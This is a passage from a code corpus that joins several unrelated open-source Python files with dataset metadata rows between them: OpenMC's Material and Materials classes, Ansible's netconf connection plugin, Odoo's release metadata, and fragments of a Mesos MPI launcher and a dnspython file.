logging.info("Cores per node %d" % cores_per_node)
scheduler = HydraScheduler(options)
framework = mesos_pb2.FrameworkInfo()
framework.user = ""
if options.name is not None:
framework.name = options.name
else:
framework.name = "MPICH2 Hydra : %s" % mpi_program[0]
work_dir = tempfile.mkdtemp()
driver = mesos.MesosSchedulerDriver(
scheduler,
framework,
args[0])
sys.exit(0 if driver.run() == mesos_pb2.DRIVER_STOPPED else 1)
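# Example invocation (illustrative only; the master URL, HDFS name node and
# MPI binary below are assumptions):
#   HDFS_NAME_NODE=namenode:8020 ./mrun.py -N 2 -n 8 -c 1 -m 1024 \
#       zk://zk1:2181/mesos ./my_mpi_binary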
| apache-2.0 | 2,096,012,464,750,074,400 | 30.031008 | 149 | 0.624032 | false |
walshjon/openmc | openmc/material.py | 1 | 35739 | from collections import OrderedDict
from copy import deepcopy
from numbers import Real, Integral
import warnings
from xml.etree import ElementTree as ET
import numpy as np
import openmc
import openmc.data
import openmc.checkvalue as cv
from openmc.clean_xml import clean_xml_indentation
from .mixin import IDManagerMixin
# Units for density supported by OpenMC
DENSITY_UNITS = ['g/cm3', 'g/cc', 'kg/m3', 'atom/b-cm', 'atom/cm3', 'sum',
'macro']
class Material(IDManagerMixin):
"""A material composed of a collection of nuclides/elements.
To create a material, one should create an instance of this class, add
nuclides or elements with :meth:`Material.add_nuclide` or
`Material.add_element`, respectively, and set the total material density
with `Material.set_density()`. The material can then be assigned to a cell
using the :attr:`Cell.fill` attribute.
Parameters
----------
material_id : int, optional
Unique identifier for the material. If not specified, an identifier will
automatically be assigned.
name : str, optional
Name of the material. If not specified, the name will be the empty
string.
temperature : float, optional
Temperature of the material in Kelvin. If not specified, the material
inherits the default temperature applied to the model.
Attributes
----------
id : int
Unique identifier for the material
temperature : float
Temperature of the material in Kelvin.
density : float
Density of the material (units defined separately)
density_units : str
Units used for `density`. Can be one of 'g/cm3', 'g/cc', 'kg/m3',
'atom/b-cm', 'atom/cm3', 'sum', or 'macro'. The 'macro' unit only
applies in the case of a multi-group calculation.
depletable : bool
Indicate whether the material is depletable.
nuclides : list of tuple
List in which each item is a 3-tuple consisting of a nuclide string, the
percent density, and the percent type ('ao' or 'wo').
isotropic : list of str
Nuclides for which elastic scattering should be treated as though it
were isotropic in the laboratory system.
average_molar_mass : float
The average molar mass of nuclides in the material in units of grams per
mol. For example, UO2 with 3 nuclides will have an average molar mass
of 270 / 3 = 90 g / mol.
volume : float
Volume of the material in cm^3. This can either be set manually or
calculated in a stochastic volume calculation and added via the
:meth:`Material.add_volume_information` method.
paths : list of str
The paths traversed through the CSG tree to reach each material
instance. This property is initialized by calling the
:meth:`Geometry.determine_paths` method.
num_instances : int
The number of instances of this material throughout the geometry.
fissionable_mass : float
Mass of fissionable nuclides in the material in [g]. Requires that the
:attr:`volume` attribute is set.
"""
next_id = 1
used_ids = set()
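    # Added usage sketch (nuclide fractions and density below are illustrative,
    # not taken from the source), following the workflow in the docstring:
    #   fuel = Material(name='UO2 fuel')
    #   fuel.add_nuclide('U235', 0.04)
    #   fuel.add_nuclide('U238', 0.96)
    #   fuel.add_element('O', 2.0)
    #   fuel.set_density('g/cm3', 10.4)
    #   some_cell.fill = fuel      # 'some_cell' is a hypothetical openmc.Cell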
def __init__(self, material_id=None, name='', temperature=None):
# Initialize class attributes
self.id = material_id
self.name = name
self.temperature = temperature
self._density = None
self._density_units = 'sum'
self._depletable = False
self._paths = None
self._num_instances = None
self._volume = None
self._atoms = {}
self._isotropic = []
# A list of tuples (nuclide, percent, percent type)
self._nuclides = []
# The single instance of Macroscopic data present in this material
# (only one is allowed, hence this is different than _nuclides, etc)
self._macroscopic = None
# If specified, a list of table names
self._sab = []
# If true, the material will be initialized as distributed
self._convert_to_distrib_comps = False
# If specified, this file will be used instead of composition values
self._distrib_otf_file = None
def __repr__(self):
string = 'Material\n'
string += '{: <16}=\t{}\n'.format('\tID', self._id)
string += '{: <16}=\t{}\n'.format('\tName', self._name)
string += '{: <16}=\t{}\n'.format('\tTemperature', self._temperature)
string += '{: <16}=\t{}'.format('\tDensity', self._density)
string += ' [{}]\n'.format(self._density_units)
string += '{: <16}\n'.format('\tS(a,b) Tables')
for sab in self._sab:
string += '{: <16}=\t{}\n'.format('\tS(a,b)', sab)
string += '{: <16}\n'.format('\tNuclides')
for nuclide, percent, percent_type in self._nuclides:
string += '{: <16}'.format('\t{}'.format(nuclide))
string += '=\t{: <12} [{}]\n'.format(percent, percent_type)
if self._macroscopic is not None:
string += '{: <16}\n'.format('\tMacroscopic Data')
string += '{: <16}'.format('\t{}'.format(self._macroscopic))
return string
@property
def name(self):
return self._name
@property
def temperature(self):
return self._temperature
@property
def density(self):
return self._density
@property
def density_units(self):
return self._density_units
@property
def depletable(self):
return self._depletable
@property
def paths(self):
if self._paths is None:
raise ValueError('Material instance paths have not been determined. '
'Call the Geometry.determine_paths() method.')
return self._paths
@property
def num_instances(self):
if self._num_instances is None:
raise ValueError(
'Number of material instances have not been determined. Call '
'the Geometry.determine_paths() method.')
return self._num_instances
@property
def nuclides(self):
return self._nuclides
@property
def isotropic(self):
return self._isotropic
@property
def convert_to_distrib_comps(self):
return self._convert_to_distrib_comps
@property
def distrib_otf_file(self):
return self._distrib_otf_file
@property
def average_molar_mass(self):
# Get a list of all the nuclides, with elements expanded
nuclide_densities = self.get_nuclide_densities()
# Using the sum of specified atomic or weight amounts as a basis, sum
# the mass and moles of the material
mass = 0.
moles = 0.
for nuc, vals in nuclide_densities.items():
if vals[2] == 'ao':
mass += vals[1] * openmc.data.atomic_mass(nuc)
moles += vals[1]
else:
moles += vals[1] / openmc.data.atomic_mass(nuc)
mass += vals[1]
# Compute and return the molar mass
return mass / moles
@property
def volume(self):
return self._volume
@name.setter
def name(self, name):
if name is not None:
cv.check_type('name for Material ID="{}"'.format(self._id),
name, str)
self._name = name
else:
self._name = ''
@temperature.setter
def temperature(self, temperature):
cv.check_type('Temperature for Material ID="{}"'.format(self._id),
temperature, (Real, type(None)))
self._temperature = temperature
@depletable.setter
def depletable(self, depletable):
cv.check_type('Depletable flag for Material ID="{}"'.format(self.id),
depletable, bool)
self._depletable = depletable
@volume.setter
def volume(self, volume):
if volume is not None:
cv.check_type('material volume', volume, Real)
self._volume = volume
@isotropic.setter
def isotropic(self, isotropic):
cv.check_iterable_type('Isotropic scattering nuclides', isotropic,
str)
self._isotropic = list(isotropic)
@property
def fissionable_mass(self):
if self.volume is None:
raise ValueError("Volume must be set in order to determine mass.")
density = 0.0
for nuc, atoms_per_cc in self.get_nuclide_atom_densities().values():
Z = openmc.data.zam(nuc)[0]
if Z >= 90:
density += 1e24 * atoms_per_cc * openmc.data.atomic_mass(nuc) \
/ openmc.data.AVOGADRO
return density*self.volume
@classmethod
def from_hdf5(cls, group):
"""Create material from HDF5 group
Parameters
----------
group : h5py.Group
Group in HDF5 file
Returns
-------
openmc.Material
Material instance
"""
mat_id = int(group.name.split('/')[-1].lstrip('material '))
name = group['name'].value.decode() if 'name' in group else ''
density = group['atom_density'].value
nuc_densities = group['nuclide_densities'][...]
nuclides = group['nuclides'].value
# Create the Material
material = cls(mat_id, name)
material.depletable = bool(group.attrs['depletable'])
# Read the names of the S(a,b) tables for this Material and add them
if 'sab_names' in group:
sab_tables = group['sab_names'].value
for sab_table in sab_tables:
name = sab_table.decode()
material.add_s_alpha_beta(name)
# Set the Material's density to atom/b-cm as used by OpenMC
material.set_density(density=density, units='atom/b-cm')
# Add all nuclides to the Material
for fullname, density in zip(nuclides, nuc_densities):
name = fullname.decode().strip()
material.add_nuclide(name, percent=density, percent_type='ao')
return material
def add_volume_information(self, volume_calc):
"""Add volume information to a material.
Parameters
----------
volume_calc : openmc.VolumeCalculation
Results from a stochastic volume calculation
"""
if volume_calc.domain_type == 'material':
if self.id in volume_calc.volumes:
self._volume = volume_calc.volumes[self.id].n
self._atoms = volume_calc.atoms[self.id]
else:
raise ValueError('No volume information found for this material.')
else:
raise ValueError('No volume information found for this material.')
def set_density(self, units, density=None):
"""Set the density of the material
Parameters
----------
units : {'g/cm3', 'g/cc', 'kg/m3', 'atom/b-cm', 'atom/cm3', 'sum', 'macro'}
Physical units of density.
density : float, optional
Value of the density. Must be specified unless units is given as
'sum'.
"""
cv.check_value('density units', units, DENSITY_UNITS)
self._density_units = units
if units == 'sum':
if density is not None:
msg = 'Density "{}" for Material ID="{}" is ignored ' \
'because the unit is "sum"'.format(density, self.id)
warnings.warn(msg)
else:
if density is None:
msg = 'Unable to set the density for Material ID="{}" ' \
'because a density value must be given when not using ' \
'"sum" unit'.format(self.id)
raise ValueError(msg)
cv.check_type('the density for Material ID="{}"'.format(self.id),
density, Real)
self._density = density
@distrib_otf_file.setter
def distrib_otf_file(self, filename):
# TODO: remove this when distributed materials are merged
warnings.warn('This feature is not yet implemented in a release '
'version of openmc')
if not isinstance(filename, str) and filename is not None:
msg = 'Unable to add OTF material file to Material ID="{}" with a ' \
'non-string name "{}"'.format(self._id, filename)
raise ValueError(msg)
self._distrib_otf_file = filename
@convert_to_distrib_comps.setter
def convert_to_distrib_comps(self):
# TODO: remove this when distributed materials are merged
warnings.warn('This feature is not yet implemented in a release '
'version of openmc')
self._convert_to_distrib_comps = True
def add_nuclide(self, nuclide, percent, percent_type='ao'):
"""Add a nuclide to the material
Parameters
----------
nuclide : str
Nuclide to add, e.g., 'Mo95'
percent : float
Atom or weight percent
percent_type : {'ao', 'wo'}
'ao' for atom percent and 'wo' for weight percent
"""
cv.check_type('nuclide', nuclide, str)
cv.check_type('percent', percent, Real)
cv.check_value('percent type', percent_type, {'ao', 'wo'})
if self._macroscopic is not None:
msg = 'Unable to add a Nuclide to Material ID="{}" as a ' \
'macroscopic data-set has already been added'.format(self._id)
raise ValueError(msg)
# If nuclide name doesn't look valid, give a warning
try:
Z, _, _ = openmc.data.zam(nuclide)
except ValueError as e:
warnings.warn(str(e))
else:
# For actinides, have the material be depletable by default
if Z >= 89:
self.depletable = True
self._nuclides.append((nuclide, percent, percent_type))
def remove_nuclide(self, nuclide):
"""Remove a nuclide from the material
Parameters
----------
nuclide : str
Nuclide to remove
"""
cv.check_type('nuclide', nuclide, str)
# If the Material contains the Nuclide, delete it
for nuc in self._nuclides:
if nuclide == nuc[0]:
self._nuclides.remove(nuc)
break
def add_macroscopic(self, macroscopic):
"""Add a macroscopic to the material. This will also set the
density of the material to 1.0, unless it has been otherwise set,
as a default for Macroscopic cross sections.
Parameters
----------
macroscopic : str
Macroscopic to add
"""
# Ensure no nuclides, elements, or sab are added since these would be
# incompatible with macroscopics
if self._nuclides or self._sab:
msg = 'Unable to add a Macroscopic data set to Material ID="{}" ' \
'with a macroscopic value "{}" as an incompatible data ' \
'member (i.e., nuclide or S(a,b) table) ' \
'has already been added'.format(self._id, macroscopic)
raise ValueError(msg)
if not isinstance(macroscopic, str):
msg = 'Unable to add a Macroscopic to Material ID="{}" with a ' \
'non-string value "{}"'.format(self._id, macroscopic)
raise ValueError(msg)
if self._macroscopic is None:
self._macroscopic = macroscopic
else:
msg = 'Unable to add a Macroscopic to Material ID="{}". ' \
'Only one Macroscopic allowed per ' \
'Material.'.format(self._id)
raise ValueError(msg)
# Generally speaking, the density for a macroscopic object will
        # be 1.0. Therefore, let's set density to 1.0 so that the user
        # doesn't need to set it unless it's needed.
# Of course, if the user has already set a value of density,
# then we will not override it.
if self._density is None:
self.set_density('macro', 1.0)
def remove_macroscopic(self, macroscopic):
"""Remove a macroscopic from the material
Parameters
----------
macroscopic : str
Macroscopic to remove
"""
if not isinstance(macroscopic, str):
msg = 'Unable to remove a Macroscopic "{}" in Material ID="{}" ' \
'since it is not a string'.format(self._id, macroscopic)
raise ValueError(msg)
# If the Material contains the Macroscopic, delete it
if macroscopic == self._macroscopic:
self._macroscopic = None
def add_element(self, element, percent, percent_type='ao', enrichment=None):
"""Add a natural element to the material
Parameters
----------
element : str
Element to add, e.g., 'Zr'
percent : float
Atom or weight percent
percent_type : {'ao', 'wo'}, optional
'ao' for atom percent and 'wo' for weight percent. Defaults to atom
percent.
enrichment : float, optional
Enrichment for U235 in weight percent. For example, input 4.95 for
4.95 weight percent enriched U. Default is None
(natural composition).
"""
cv.check_type('nuclide', element, str)
cv.check_type('percent', percent, Real)
cv.check_value('percent type', percent_type, {'ao', 'wo'})
if self._macroscopic is not None:
msg = 'Unable to add an Element to Material ID="{}" as a ' \
'macroscopic data-set has already been added'.format(self._id)
raise ValueError(msg)
if enrichment is not None:
if not isinstance(enrichment, Real):
msg = 'Unable to add an Element to Material ID="{}" with a ' \
'non-floating point enrichment value "{}"'\
.format(self._id, enrichment)
raise ValueError(msg)
elif element != 'U':
msg = 'Unable to use enrichment for element {} which is not ' \
'uranium for Material ID="{}"'.format(element, self._id)
raise ValueError(msg)
# Check that the enrichment is in the valid range
cv.check_less_than('enrichment', enrichment, 100./1.008)
cv.check_greater_than('enrichment', enrichment, 0., equality=True)
if enrichment > 5.0:
msg = 'A uranium enrichment of {} was given for Material ID='\
'"{}". OpenMC assumes the U234/U235 mass ratio is '\
'constant at 0.008, which is only valid at low ' \
'enrichments. Consider setting the isotopic ' \
'composition manually for enrichments over 5%.'.\
format(enrichment, self._id)
warnings.warn(msg)
# Make sure element name is just that
if not element.isalpha():
raise ValueError("Element name should be given by the "
"element's symbol, e.g., 'Zr'")
        # Add naturally-occurring isotopes
element = openmc.Element(element)
for nuclide in element.expand(percent, percent_type, enrichment):
self.add_nuclide(*nuclide)
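        # Added note (values are illustrative): natural zirconium by atom
        # fraction would be mat.add_element('Zr', 1.0); 4.95 w/o enriched
        # uranium would be mat.add_element('U', 1.0, enrichment=4.95).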
def add_s_alpha_beta(self, name, fraction=1.0):
r"""Add an :math:`S(\alpha,\beta)` table to the material
Parameters
----------
name : str
Name of the :math:`S(\alpha,\beta)` table
fraction : float
The fraction of relevant nuclei that are affected by the
:math:`S(\alpha,\beta)` table. For example, if the material is a
block of carbon that is 60% graphite and 40% amorphous then add a
graphite :math:`S(\alpha,\beta)` table with fraction=0.6.
"""
if self._macroscopic is not None:
msg = 'Unable to add an S(a,b) table to Material ID="{}" as a ' \
'macroscopic data-set has already been added'.format(self._id)
raise ValueError(msg)
if not isinstance(name, str):
msg = 'Unable to add an S(a,b) table to Material ID="{}" with a ' \
'non-string table name "{}"'.format(self._id, name)
raise ValueError(msg)
cv.check_type('S(a,b) fraction', fraction, Real)
cv.check_greater_than('S(a,b) fraction', fraction, 0.0, True)
cv.check_less_than('S(a,b) fraction', fraction, 1.0, True)
new_name = openmc.data.get_thermal_name(name)
if new_name != name:
msg = 'OpenMC S(a,b) tables follow the GND naming convention. ' \
'Table "{}" is being renamed as "{}".'.format(name, new_name)
warnings.warn(msg)
self._sab.append((new_name, fraction))
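        # Added example (the table name follows OpenMC's GND convention but is
        # an assumption): a block of carbon that is 60% graphite would use
        # mat.add_s_alpha_beta('c_Graphite', fraction=0.6).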
def make_isotropic_in_lab(self):
self.isotropic = [x[0] for x in self._nuclides]
def get_nuclides(self):
"""Returns all nuclides in the material
Returns
-------
nuclides : list of str
List of nuclide names
"""
return [x[0] for x in self._nuclides]
def get_nuclide_densities(self):
"""Returns all nuclides in the material and their densities
Returns
-------
nuclides : dict
Dictionary whose keys are nuclide names and values are 3-tuples of
(nuclide, density percent, density percent type)
"""
nuclides = OrderedDict()
for nuclide, density, density_type in self._nuclides:
nuclides[nuclide] = (nuclide, density, density_type)
return nuclides
def get_nuclide_atom_densities(self):
"""Returns all nuclides in the material and their atomic densities in
units of atom/b-cm
Returns
-------
nuclides : dict
Dictionary whose keys are nuclide names and values are tuples of
(nuclide, density in atom/b-cm)
"""
# Expand elements in to nuclides
nuclides = self.get_nuclide_densities()
sum_density = False
if self.density_units == 'sum':
sum_density = True
density = 0.
elif self.density_units == 'macro':
density = self.density
elif self.density_units == 'g/cc' or self.density_units == 'g/cm3':
density = -self.density
elif self.density_units == 'kg/m3':
density = -0.001 * self.density
elif self.density_units == 'atom/b-cm':
density = self.density
elif self.density_units == 'atom/cm3' or self.density_units == 'atom/cc':
density = 1.E-24 * self.density
# For ease of processing split out nuc, nuc_density,
        # and nuc_density_type into separate arrays
nucs = []
nuc_densities = []
nuc_density_types = []
for nuclide in nuclides.items():
nuc, nuc_density, nuc_density_type = nuclide[1]
nucs.append(nuc)
nuc_densities.append(nuc_density)
nuc_density_types.append(nuc_density_type)
nucs = np.array(nucs)
nuc_densities = np.array(nuc_densities)
nuc_density_types = np.array(nuc_density_types)
if sum_density:
density = np.sum(nuc_densities)
percent_in_atom = np.all(nuc_density_types == 'ao')
density_in_atom = density > 0.
sum_percent = 0.
# Convert the weight amounts to atomic amounts
if not percent_in_atom:
for n, nuc in enumerate(nucs):
nuc_densities[n] *= self.average_molar_mass / \
openmc.data.atomic_mass(nuc)
        # Now that we have the atomic amounts, let's finish calculating densities
sum_percent = np.sum(nuc_densities)
nuc_densities = nuc_densities / sum_percent
# Convert the mass density to an atom density
if not density_in_atom:
density = -density / self.average_molar_mass * 1.E-24 \
* openmc.data.AVOGADRO
nuc_densities = density * nuc_densities
nuclides = OrderedDict()
for n, nuc in enumerate(nucs):
nuclides[nuc] = (nuc, nuc_densities[n])
return nuclides
def get_mass_density(self, nuclide=None):
"""Return mass density of one or all nuclides
Parameters
----------
        nuclide : str, optional
Nuclide for which density is desired. If not specified, the density
for the entire material is given.
Returns
-------
float
Density of the nuclide/material in [g/cm^3]
"""
mass_density = 0.0
for nuc, atoms_per_cc in self.get_nuclide_atom_densities().values():
density_i = 1e24 * atoms_per_cc * openmc.data.atomic_mass(nuc) \
/ openmc.data.AVOGADRO
if nuclide is None or nuclide == nuc:
mass_density += density_i
return mass_density
def get_mass(self, nuclide=None):
"""Return mass of one or all nuclides.
Note that this method requires that the :attr:`Material.volume` has
already been set.
Parameters
----------
        nuclide : str, optional
            Nuclide for which mass is desired. If not specified, the mass
            of the entire material is given.
Returns
-------
float
Mass of the nuclide/material in [g]
"""
if self.volume is None:
raise ValueError("Volume must be set in order to determine mass.")
return self.volume*self.get_mass_density(nuclide)
def clone(self, memo=None):
"""Create a copy of this material with a new unique ID.
Parameters
----------
memo : dict or None
A nested dictionary of previously cloned objects. This parameter
is used internally and should not be specified by the user.
Returns
-------
clone : openmc.Material
The clone of this material
"""
if memo is None:
memo = {}
        # If no memoized clone exists, instantiate one
if self not in memo:
# Temporarily remove paths -- this is done so that when the clone is
# made, it doesn't create a copy of the paths (which are specific to
# an instance)
paths = self._paths
self._paths = None
clone = deepcopy(self)
clone.id = None
clone._num_instances = None
# Restore paths on original instance
self._paths = paths
# Memoize the clone
memo[self] = clone
return memo[self]
def _get_nuclide_xml(self, nuclide, distrib=False):
xml_element = ET.Element("nuclide")
xml_element.set("name", nuclide[0])
if not distrib:
if nuclide[2] == 'ao':
xml_element.set("ao", str(nuclide[1]))
else:
xml_element.set("wo", str(nuclide[1]))
return xml_element
def _get_macroscopic_xml(self, macroscopic):
xml_element = ET.Element("macroscopic")
xml_element.set("name", macroscopic)
return xml_element
def _get_nuclides_xml(self, nuclides, distrib=False):
xml_elements = []
for nuclide in nuclides:
xml_elements.append(self._get_nuclide_xml(nuclide, distrib))
return xml_elements
def to_xml_element(self, cross_sections=None):
"""Return XML representation of the material
Parameters
----------
cross_sections : str
Path to an XML cross sections listing file
Returns
-------
element : xml.etree.ElementTree.Element
XML element containing material data
"""
# Create Material XML element
element = ET.Element("material")
element.set("id", str(self._id))
if len(self._name) > 0:
element.set("name", str(self._name))
if self._depletable:
element.set("depletable", "true")
# Create temperature XML subelement
if self.temperature is not None:
subelement = ET.SubElement(element, "temperature")
subelement.text = str(self.temperature)
# Create density XML subelement
if self._density is not None or self._density_units == 'sum':
subelement = ET.SubElement(element, "density")
if self._density_units != 'sum':
subelement.set("value", str(self._density))
subelement.set("units", self._density_units)
else:
raise ValueError('Density has not been set for material {}!'
.format(self.id))
if not self._convert_to_distrib_comps:
if self._macroscopic is None:
# Create nuclide XML subelements
subelements = self._get_nuclides_xml(self._nuclides)
for subelement in subelements:
element.append(subelement)
else:
# Create macroscopic XML subelements
subelement = self._get_macroscopic_xml(self._macroscopic)
element.append(subelement)
else:
subelement = ET.SubElement(element, "compositions")
comps = []
allnucs = self._nuclides
dist_per_type = allnucs[0][2]
for nuc in allnucs:
if nuc[2] != dist_per_type:
msg = 'All nuclides and elements in a distributed ' \
'material must have the same type, either ao or wo'
raise ValueError(msg)
comps.append(nuc[1])
if self._distrib_otf_file is None:
# Create values and units subelements
subsubelement = ET.SubElement(subelement, "values")
subsubelement.text = ' '.join([str(c) for c in comps])
subsubelement = ET.SubElement(subelement, "units")
subsubelement.text = dist_per_type
else:
# Specify the materials file
subsubelement = ET.SubElement(subelement, "otf_file_path")
subsubelement.text = self._distrib_otf_file
if self._macroscopic is None:
# Create nuclide XML subelements
subelements = self._get_nuclides_xml(self._nuclides,
distrib=True)
for subelement_nuc in subelements:
subelement.append(subelement_nuc)
else:
# Create macroscopic XML subelements
subsubelement = self._get_macroscopic_xml(self._macroscopic)
subelement.append(subsubelement)
if self._sab:
for sab in self._sab:
subelement = ET.SubElement(element, "sab")
subelement.set("name", sab[0])
if sab[1] != 1.0:
subelement.set("fraction", str(sab[1]))
if self._isotropic:
subelement = ET.SubElement(element, "isotropic")
subelement.text = ' '.join(self._isotropic)
return element
class Materials(cv.CheckedList):
"""Collection of Materials used for an OpenMC simulation.
This class corresponds directly to the materials.xml input file. It can be
thought of as a normal Python list where each member is a
:class:`Material`. It behaves like a list as the following example
demonstrates:
>>> fuel = openmc.Material()
>>> clad = openmc.Material()
>>> water = openmc.Material()
>>> m = openmc.Materials([fuel])
>>> m.append(water)
>>> m += [clad]
Parameters
----------
materials : Iterable of openmc.Material
Materials to add to the collection
cross_sections : str
Indicates the path to an XML cross section listing file (usually named
cross_sections.xml). If it is not set, the
:envvar:`OPENMC_CROSS_SECTIONS` environment variable will be used for
continuous-energy calculations and
:envvar:`OPENMC_MG_CROSS_SECTIONS` will be used for multi-group
calculations to find the path to the HDF5 cross section file.
multipole_library : str
Indicates the path to a directory containing a windowed multipole
cross section library. If it is not set, the
:envvar:`OPENMC_MULTIPOLE_LIBRARY` environment variable will be used. A
multipole library is optional.
"""
def __init__(self, materials=None):
super().__init__(Material, 'materials collection')
self._cross_sections = None
self._multipole_library = None
if materials is not None:
self += materials
@property
def cross_sections(self):
return self._cross_sections
@property
def multipole_library(self):
return self._multipole_library
@cross_sections.setter
def cross_sections(self, cross_sections):
cv.check_type('cross sections', cross_sections, str)
self._cross_sections = cross_sections
@multipole_library.setter
def multipole_library(self, multipole_library):
cv.check_type('cross sections', multipole_library, str)
self._multipole_library = multipole_library
def append(self, material):
"""Append material to collection
Parameters
----------
material : openmc.Material
Material to append
"""
super().append(material)
def insert(self, index, material):
"""Insert material before index
Parameters
----------
index : int
Index in list
material : openmc.Material
Material to insert
"""
super().insert(index, material)
def make_isotropic_in_lab(self):
for material in self:
material.make_isotropic_in_lab()
def _create_material_subelements(self, root_element):
for material in sorted(self, key=lambda x: x.id):
root_element.append(material.to_xml_element(self.cross_sections))
def _create_cross_sections_subelement(self, root_element):
if self._cross_sections is not None:
element = ET.SubElement(root_element, "cross_sections")
element.text = str(self._cross_sections)
def _create_multipole_library_subelement(self, root_element):
if self._multipole_library is not None:
element = ET.SubElement(root_element, "multipole_library")
element.text = str(self._multipole_library)
def export_to_xml(self, path='materials.xml'):
"""Export material collection to an XML file.
Parameters
----------
path : str
Path to file to write. Defaults to 'materials.xml'.
"""
root_element = ET.Element("materials")
self._create_cross_sections_subelement(root_element)
self._create_multipole_library_subelement(root_element)
self._create_material_subelements(root_element)
# Clean the indentation in the file to be user-readable
clean_xml_indentation(root_element)
# Write the XML Tree to the materials.xml file
tree = ET.ElementTree(root_element)
tree.write(path, xml_declaration=True, encoding='utf-8')
| mit | -6,152,514,071,550,136,000 | 33.867317 | 83 | 0.574303 | false |
Inspq/ansible | lib/ansible/plugins/connection/netconf.py | 1 | 4517 | #
# (c) 2016 Red Hat Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import re
import socket
import json
import signal
import logging
from ansible import constants as C
from ansible.errors import AnsibleConnectionFailure, AnsibleError
from ansible.plugins.connection import ConnectionBase, ensure_connect
from ansible.module_utils.six.moves import StringIO
try:
from ncclient import manager
from ncclient.operations import RPCError
from ncclient.transport.errors import SSHUnknownHostError
from ncclient.xml_ import to_ele, to_xml
except ImportError:
raise AnsibleError("ncclient is not installed")
try:
from __main__ import display
except ImportError:
from ansible.utils.display import Display
display = Display()
logging.getLogger('ncclient').setLevel(logging.INFO)
logger = logging.getLogger(__name__)
class Connection(ConnectionBase):
''' NetConf connections '''
transport = 'netconf'
has_pipelining = False
def __init__(self, play_context, new_stdin, *args, **kwargs):
super(Connection, self).__init__(play_context, new_stdin, *args, **kwargs)
self._network_os = self._play_context.network_os or 'default'
display.display('network_os is set to %s' % self._network_os, log_only=True)
self._manager = None
self._connected = False
def log(self, msg):
msg = 'h=%s u=%s %s' % (self._play_context.remote_addr, self._play_context.remote_user, msg)
logger.debug(msg)
def _connect(self):
super(Connection, self)._connect()
        display.display('ssh connection done, starting ncclient', log_only=True)
allow_agent = True
if self._play_context.password is not None:
allow_agent = False
key_filename = None
if self._play_context.private_key_file:
key_filename = os.path.expanduser(self._play_context.private_key_file)
if not self._network_os:
            raise AnsibleConnectionFailure('network_os must be set for netconf connections')
try:
self._manager = manager.connect(
host=self._play_context.remote_addr,
port=self._play_context.port or 830,
username=self._play_context.remote_user,
password=self._play_context.password,
key_filename=str(key_filename),
hostkey_verify=C.HOST_KEY_CHECKING,
look_for_keys=C.PARAMIKO_LOOK_FOR_KEYS,
allow_agent=allow_agent,
timeout=self._play_context.timeout,
device_params={'name': self._network_os}
)
except SSHUnknownHostError as exc:
raise AnsibleConnectionFailure(str(exc))
if not self._manager.connected:
return (1, '', 'not connected')
display.display('ncclient manager object created successfully', log_only=True)
self._connected = True
return (0, self._manager.session_id, '')
def close(self):
if self._manager:
self._manager.close_session()
self._connected = False
super(Connection, self).close()
@ensure_connect
def exec_command(self, request):
"""Sends the request to the node and returns the reply
"""
if request == 'open_session()':
return (0, 'ok', '')
req = to_ele(request)
if req is None:
return (1, '', 'unable to parse request')
try:
reply = self._manager.rpc(req)
except RPCError as exc:
return (1, '', to_xml(exc.xml))
return (0, reply.data_xml, '')
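        # Added illustration (the RPC payload below is an assumption; any
        # well-formed NETCONF request element is accepted):
        #   rc, reply, err = conn.exec_command(
        #       '<get-config><source><running/></source></get-config>')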
def put_file(self, in_path, out_path):
"""Transfer a file from local to remote"""
pass
def fetch_file(self, in_path, out_path):
"""Fetch a file from remote to local"""
pass
| gpl-3.0 | -3,208,970,745,957,846,000 | 31.496403 | 100 | 0.640469 | false |
nathanaevitas/odoo | openerp/release.py | 1 | 2634 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-TODAY OpenERP S.A. <http://www.openerp.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
RELEASE_LEVELS = [ALPHA, BETA, RELEASE_CANDIDATE, FINAL] = ['alpha', 'beta', 'candidate', 'final']
RELEASE_LEVELS_DISPLAY = {ALPHA: ALPHA,
BETA: BETA,
RELEASE_CANDIDATE: 'rc',
FINAL: ''}
# version_info format: (MAJOR, MINOR, MICRO, RELEASE_LEVEL, SERIAL)
# inspired by Python's own sys.version_info, in order to be
# properly comparable using normal operarors, for example:
# (6,1,0,'beta',0) < (6,1,0,'candidate',1) < (6,1,0,'candidate',2)
# (6,1,0,'candidate',2) < (6,1,0,'final',0) < (6,1,2,'final',0)
version_info = (8, 0, 0, FINAL, 0)
version = '.'.join(map(str, version_info[:2])) + RELEASE_LEVELS_DISPLAY[version_info[3]] + str(version_info[4] or '')
series = serie = major_version = '.'.join(map(str, version_info[:2]))
product_name = 'Odoo'
description = 'Odoo Server'
long_desc = '''Odoo is a complete ERP and CRM. The main features are accounting (analytic
and financial), stock management, sales and purchases management, tasks
automation, marketing campaigns, help desk, POS, etc. Technical features include
a distributed server, flexible workflows, an object database, a dynamic GUI,
customizable reports, and XML-RPC interfaces.
'''
classifiers = """Development Status :: 5 - Production/Stable
License :: OSI Approved :: GNU Affero General Public License v3
Programming Language :: Python
"""
url = 'https://www.odoo.com'
author = 'OpenERP S.A.'
author_email = '[email protected]'
license = 'AGPL-3'
nt_service_name = "odoo-server-" + series
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
version += '-20151104'
# hash = 'a69205d'
| agpl-3.0 | -2,245,725,345,032,258,300 | 44.413793 | 117 | 0.643888 | false |
waynechu/PythonProject | dns/rdtypes/ANY/AVC.py | 2 | 1027 | # Copyright (C) Dnspython Contributors, see LICENSE for text of ISC license
# Copyright (C) 2016 Nominum, Inc.
#
